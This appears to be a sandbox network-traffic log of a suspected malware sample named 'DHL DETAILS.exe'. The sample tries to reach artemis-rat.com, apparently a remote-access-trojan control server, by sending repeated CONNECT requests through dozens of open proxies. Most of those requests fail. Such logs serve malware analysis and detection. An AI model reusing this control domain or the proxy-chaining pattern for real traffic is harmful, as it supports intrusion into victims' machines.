Mar 9, 2024 13:14:18.400392056 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1282	192.168.2.5	53757	171.250.222.13	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.246237040 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.036412954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1283	192.168.2.5	53758	47.243.114.192	8180	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.246516943 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1284	192.168.2.5	53787	172.67.182.102	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.249123096 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.405886889 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1285	192.168.2.5	53798	172.67.181.85	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.249177933 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.406197071 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1286	192.168.2.5	53774	103.152.112.167	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.253303051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.427706003 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.23.2 Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1287	192.168.2.5	53805	74.48.7.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.253314972 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.414180994 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.25.3 Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 35 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.25.3</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1288	192.168.2.5	53956	61.130.9.38	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.263186932 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1289	192.168.2.5	53957	61.130.9.38	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.264024019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1290	192.168.2.5	53960	61.130.9.38	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.264858007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1291	192.168.2.5	53962	61.130.9.38	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.265662909 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1292	192.168.2.5	52784	36.92.193.189	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.275425911 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1293	192.168.2.5	53762	91.107.180.250	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.291205883 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.599426031 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1294	192.168.2.5	53997	152.32.132.220	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.294924974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1295	192.168.2.5	53801	198.12.253.117	31131	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.294979095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.833422899 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.536959887 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:21.036962032 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1296	192.168.2.5	54003	152.32.132.220	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.299683094 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1297	192.168.2.5	54005	152.32.132.220	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.301089048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1298	192.168.2.5	54006	152.32.132.220	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.302442074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1299	192.168.2.5	53799	191.102.159.157	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.305584908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.800265074 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1300	192.168.2.5	53853	172.64.207.185	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.306974888 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.468655109 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1301	192.168.2.5	53816	45.196.151.120	5432	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.341535091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.559897900 CET	308	IN	HTTP/1.1 407 Proxy Authentication Required Server: FaaS v1.3-20220203-7fa38bd5af Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 65 Proxy-Authenticate: Basic realm="Proxy" Connection: close Data Raw: 48 54 54 50 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 65 72 72 6f 72 3a 20 69 70 20 61 75 74 68 20 66 61 69 6c 65 64 2c 20 6e 6f 20 63 72 65 64 65 6e 74 69 61 6c 73 20 70 72 6f 76 69 64 65 64 Data Ascii: HTTP authorization error: ip auth failed, no credentials provided

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1302	192.168.2.5	53859	185.162.231.226	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.342324018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:18.497766018 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:18 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1303	192.168.2.5	53326	192.252.216.81	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.345736027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1304	192.168.2.5	53107	61.173.113.226	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.353672981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1305	192.168.2.5	53891	104.17.239.10	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:18.353719950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
